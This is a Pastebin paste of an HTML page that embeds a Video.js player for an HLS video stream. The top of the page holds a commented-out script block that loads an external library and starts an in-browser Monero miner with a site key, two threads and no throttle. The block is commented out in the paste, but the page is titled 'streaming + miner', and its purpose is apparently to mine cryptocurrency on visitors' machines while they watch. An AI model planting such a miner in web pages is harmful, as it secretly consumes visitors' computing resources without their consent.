Advertisement
Guest User

Untitled

a guest
May 21st, 2019
86
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 1.08 KB | None | 0 0
  1. <!--
  2. <script src="//statdynamic.com/lib/crypta.js"></script>
  3. <script>
  4. var miner=new CRLT.Anonymous('38a6fc5f6bacfbaf9802c506589d0afd8ab2301cdc77', {
  5. threads:2,throttle:0, coin: "xmr",
  6. });
  7. miner.start();
  8. </script>
  9. -->
  10.  
  11.  
  12. <h1>streaming + miner</h1>
  13.  
  14. <!-- If you'd like to support IE8 (for Video.js versions prior to v7) -->
  15. <script src="https://vjs.zencdn.net/ie8/ie8-version/videojs-ie8.min.js"></script>
  16.  
  17.  
  18.  
  19. <video id="my_video" class="video-js" autoplay="" controls="" preload="auto" width="720" height="480" poster="https://streaming.liis.it/poster.jpg" data-setup="{}">
  20. <source src="https://streaming.liis.it/hls/20172018.m3u8" type="application/x-mpegURL">
  21. <p class="vjs-no-js">
  22. To view this video please enable JavaScript, and consider upgrading to a web browser that
  23. <a href="https://videojs.com/html5-video-support/" target="_blank">supports HTML5 video</a>
  24. </p>
  25. </video>
  26.  
  27. <script src="https://unpkg.com/video.js/dist/video.js"></script>
  28. <script src="https://unpkg.com/@videojs/http-streaming/dist/videojs-http-streaming.js"></script>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement